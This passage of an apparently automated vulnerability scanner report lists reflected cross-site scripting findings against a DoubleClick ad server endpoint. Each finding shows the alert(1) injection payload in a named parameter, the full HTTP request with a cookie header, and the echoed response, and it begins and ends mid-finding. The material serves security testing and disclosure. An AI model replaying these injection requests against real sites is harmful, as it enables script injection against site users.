Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.14. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61f0c"-alert(1)-"f906c58d3ba was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=61f0c"-alert(1)-"f906c58d3ba HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=61f0c"-alert(1)-"f906c58d3bahttp://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c92'-alert(1)-'1edd0185642 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=78c92'-alert(1)-'1edd0185642 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=78c92'-alert(1)-'1edd0185642http://www.unum.com/voluntary\">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c26ac"-alert(1)-"4050e370dbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&c26ac"-alert(1)-"4050e370dbe=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:42:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6473

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&c26ac"-alert(1)-"4050e370dbe=1http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
va
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3d94'-alert(1)-'1f7a615340a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&d3d94'-alert(1)-'1f7a615340a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:42:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6473

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&d3d94'-alert(1)-'1f7a615340a=1http://www.unum.com/voluntary\">
...[SNIP]...

4.18. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 411c7'-alert(1)-'2d5dec84db9 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post411c7'-alert(1)-'2d5dec84db9&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post411c7'-alert(1)-'2d5dec84db9&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.19. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a6ae"-alert(1)-"34c68b6b7ed was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post3a6ae"-alert(1)-"34c68b6b7ed&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post3a6ae"-alert(1)-"34c68b6b7ed&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
va
...[SNIP]...

4.20. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3ecc"-alert(1)-"751fd290be4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAdf3ecc"-alert(1)-"751fd290be4&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
3%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAdf3ecc"-alert(1)-"751fd290be4&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

4.21. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479c8'-alert(1)-'10d3faac88e was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd479c8'-alert(1)-'10d3faac88e&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
3%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd479c8'-alert(1)-'10d3faac88e&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.22. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e249'-alert(1)-'67112d083f4 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb9e249'-alert(1)-'67112d083f4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
x_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb9e249'-alert(1)-'67112d083f4&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.23. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22bd"-alert(1)-"1f5f893988d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cbd22bd"-alert(1)-"1f5f893988d&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
